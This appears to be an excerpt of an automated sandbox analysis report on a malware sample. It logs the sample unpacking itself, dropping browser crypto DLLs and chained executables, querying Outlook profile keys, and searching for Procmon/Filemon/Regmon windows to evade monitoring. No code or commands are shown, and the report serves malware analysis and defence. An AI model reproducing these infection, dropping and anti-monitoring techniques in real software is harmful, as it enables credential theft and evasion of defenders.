Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2136,i,6607113195327049386,14986448368606126655,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2092,i,10298190665720480491,4854320900994786694,262144 /prefetch:3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\JJECFIECBG.exe "C:\Users\user\Documents\JJECFIECBG.exe"	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe "C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Section loaded: schannel.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1787904 > 1048576

Source: file.exe

Static PE information: Raw size of jxsibylc is bigger than: 0x100000 < 0x19a400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 1.2.file.exe.fc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jxsibylc:EW;gaqfpirs:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jxsibylc:EW;gaqfpirs:EW;.taggant:EW;
Source: C:\Users\user\Documents\JJECFIECBG.exe	Unpacked PE file: 19.2.JJECFIECBG.exe.620000.0.unpack :EW;.rsrc:W;.idata :W;akyzlcoy:EW;zjlmqufv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;akyzlcoy:EW;zjlmqufv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 20.2.skotes.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;akyzlcoy:EW;zjlmqufv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;akyzlcoy:EW;zjlmqufv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 22.2.skotes.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;akyzlcoy:EW;zjlmqufv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;akyzlcoy:EW;zjlmqufv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Unpacked PE file: 24.2.60949160aa.exe.4f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wdzyrihu:EW;vkjitssl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wdzyrihu:EW;vkjitssl:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6C963480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,

1_2_6C963480

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: skotes.exe.19.dr	Static PE information: real checksum: 0x30c7cd should be: 0x3188a6
Source: 60949160aa.exe.22.dr	Static PE information: real checksum: 0x1d1cfb should be: 0x1d83a2
Source: random[1].exe.22.dr	Static PE information: real checksum: 0x1d1cfb should be: 0x1d83a2
Source: file.exe	Static PE information: real checksum: 0x1bc799 should be: 0x1bf7b7
Source: JJECFIECBG.exe.1.dr	Static PE information: real checksum: 0x30c7cd should be: 0x3188a6
Source: random[1].exe.1.dr	Static PE information: real checksum: 0x30c7cd should be: 0x3188a6

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: jxsibylc
Source: file.exe	Static PE information: section name: gaqfpirs
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: random[1].exe.1.dr	Static PE information: section name:
Source: random[1].exe.1.dr	Static PE information: section name: .idata
Source: random[1].exe.1.dr	Static PE information: section name: akyzlcoy
Source: random[1].exe.1.dr	Static PE information: section name: zjlmqufv
Source: random[1].exe.1.dr	Static PE information: section name: .taggant
Source: JJECFIECBG.exe.1.dr	Static PE information: section name:
Source: JJECFIECBG.exe.1.dr	Static PE information: section name: .idata
Source: JJECFIECBG.exe.1.dr	Static PE information: section name: akyzlcoy
Source: JJECFIECBG.exe.1.dr	Static PE information: section name: zjlmqufv
Source: JJECFIECBG.exe.1.dr	Static PE information: section name: .taggant
Source: skotes.exe.19.dr	Static PE information: section name:
Source: skotes.exe.19.dr	Static PE information: section name: .idata
Source: skotes.exe.19.dr	Static PE information: section name: akyzlcoy
Source: skotes.exe.19.dr	Static PE information: section name: zjlmqufv
Source: skotes.exe.19.dr	Static PE information: section name: .taggant
Source: random[1].exe.22.dr	Static PE information: section name:
Source: random[1].exe.22.dr	Static PE information: section name: .idata
Source: random[1].exe.22.dr	Static PE information: section name:
Source: random[1].exe.22.dr	Static PE information: section name: wdzyrihu
Source: random[1].exe.22.dr	Static PE information: section name: vkjitssl
Source: random[1].exe.22.dr	Static PE information: section name: .taggant
Source: 60949160aa.exe.22.dr	Static PE information: section name:
Source: 60949160aa.exe.22.dr	Static PE information: section name: .idata
Source: 60949160aa.exe.22.dr	Static PE information: section name:
Source: 60949160aa.exe.22.dr	Static PE information: section name: wdzyrihu
Source: 60949160aa.exe.22.dr	Static PE information: section name: vkjitssl
Source: 60949160aa.exe.22.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C99B536 push ecx; ret	1_2_6C99B549
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_0063D91C push ecx; ret	19_2_0063D92F
Source: C:\Users\user\Documents\JJECFIECBG.exe	Code function: 19_2_00631359 push es; ret	19_2_0063135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_0071D91C push ecx; ret	20_2_0071D92F

Source: file.exe	Static PE information: section name: jxsibylc entropy: 7.954664220739316
Source: random[1].exe.1.dr	Static PE information: section name: entropy: 7.035510665529982
Source: JJECFIECBG.exe.1.dr	Static PE information: section name: entropy: 7.035510665529982
Source: skotes.exe.19.dr	Static PE information: section name: entropy: 7.035510665529982
Source: random[1].exe.22.dr	Static PE information: section name: entropy: 7.98408643888035
Source: random[1].exe.22.dr	Static PE information: section name: wdzyrihu entropy: 7.953424669396828
Source: 60949160aa.exe.22.dr	Static PE information: section name: entropy: 7.98408643888035
Source: 60949160aa.exe.22.dr	Static PE information: section name: wdzyrihu entropy: 7.953424669396828

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\JJECFIECBG.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\JJECFIECBG.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\JJECFIECBG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\JJECFIECBG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
